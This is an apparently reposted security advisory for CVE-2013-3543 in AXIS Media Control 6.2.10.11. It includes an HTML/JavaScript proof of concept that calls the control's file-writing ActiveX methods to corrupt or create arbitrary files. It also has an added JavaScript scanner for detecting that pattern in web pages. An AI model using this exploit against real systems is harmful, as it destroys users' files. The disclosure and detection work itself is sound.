AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method
Source: vfocus.net  Author: Javier  Published: 2013-06-14
========================================================================
AXIS
========================================================================

1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description
A vulnerability has been found in these devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method (CWE-618)

3.Affected Products
CVE-2013-3543: all camera devices using AXIS Media Control (AMC) are affected.
The vulnerability affects the latest version of the software (6.2.10.11, which was released on October 19, 2012).

4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
The vendor website states that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.”
The vulnerability can be exploited by a remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.
The vulnerability exists because the ActiveX control exposes the insecure "StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in the "AxisMediaControlEmb.dll" DLL.
This can be exploited to corrupt or create arbitrary files in the context of the current user.
In the following example we will corrupt regedit.exe using one of the vulnerable ActiveX methods:
 
When we click on one of the buttons, we can see that regedit.exe is overwritten with garbage:
 
The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
    <head>
        <title></title>
        <script language="javaScript" type="text/javascript">
            // Each wrapper passes a caller-chosen path to one of the control's file-writing methods.
            function startRecord(){
                var theFile = "FilePath//File_name_to_corrupt_or_create";
                MyActiveX.StartRecord(theFile);
            }
            function saveCurrentImage(){
                var theFile = "FilePath//File_name_to_corrupt_or_create";
                var theFormat = 1;
                MyActiveX.SaveCurrentImage(theFormat, theFile);
            }
            function startRecordMedia(){
                var theFile = "FilePath//File_name_to_corrupt_or_create";
                var theFlags = 1;
                var theMediaTypes = "default";
                MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
            }
        </script>
    </head>
    <body>
    <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
    <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
    <param name="MediaType" value="mjpeg">
    <param name="Volume" value="1">
    <param name="ShowStatusBar" value="1">
    <param name="ShowToolbar" value="1">
    <param name="AutoStart" value="1">
    <param name="UIMode" value="ptz-relative">
    <param name="MediaType" value="mjpeg-unicast">
    <param name="StretchToFit" value="0">
    <param name="PTZControlURL" value="http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi">
    </object>
    <br>
    <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
    <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
    <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
    </body>
</html>
_____________________________________________________________________________
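
For defenders, the pattern in the PoC above (an `<object>` carrying the AMC CLSID plus a scripted call to one of the three named methods) can be matched in page content, for example at a web proxy or when reviewing cached HTML. The following is an added example, not part of the original advisory; the function name `scanForAmcFileWrites`, the sample page and the placeholder path are constructed for illustration.

```javascript
// Added example: static check for the pattern in the advisory's PoC.
const AMC_CLSID = "DE625294-70E6-45ED-B895-CFFA13AEB044"; // CLSID from the PoC
const UNSAFE_METHODS = ["StartRecord", "SaveCurrentImage", "StartRecordMedia"];

// Constructed sample page; the path argument is a placeholder, not a real file.
const SAMPLE_PAGE = `
<object id=cam classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}"></object>
<script>
  function go() { cam.StartRecordMedia("PLACEHOLDER_PATH", 1, "default"); }
</script>`;

// Returns { embedsControl, objectIds, calls: [{ objectId, method, args }] }.
function scanForAmcFileWrites(html) {
  const objectIds = [];
  const tagRe = /<object\b[^>]*>/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const classid = /\bclassid\s*=\s*["']?\s*clsid:\s*\{?([0-9a-f-]{36})\}?/i.exec(tag[0]);
    if (!classid || classid[1].toUpperCase() !== AMC_CLSID) continue;
    // The id attribute is the name page script uses to reach the control.
    const id = /\bid\s*=\s*["']?([A-Za-z_]\w*)/i.exec(tag[0]);
    objectIds.push(id ? id[1] : null);
  }
  const calls = [];
  for (const id of objectIds.filter(Boolean)) {
    const callRe = new RegExp(
      "\\b" + id + "\\s*\\.\\s*(" + UNSAFE_METHODS.join("|") + ")\\s*\\(([^)]*)\\)", "g");
    let call;
    while ((call = callRe.exec(html)) !== null) {
      calls.push({ objectId: id, method: call[1], args: call[2].trim() });
    }
  }
  return { embedsControl: objectIds.length > 0, objectIds, calls };
}

const report = scanForAmcFileWrites(SAMPLE_PAGE);
console.log(JSON.stringify(report, null, 2));
```

This is a static match on literal markup and script text, so a page with `embedsControl` true from an untrusted origin is worth review even when `calls` is empty.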

5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.

6.Report Timeline
-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability
-2013-05-24: Axis team asks for a report with technical information. 
-2013-05-26: Technical details sent to Axis. 
-2013-05-27: Axis team reports to the technical support to analyze the vulnerability.

 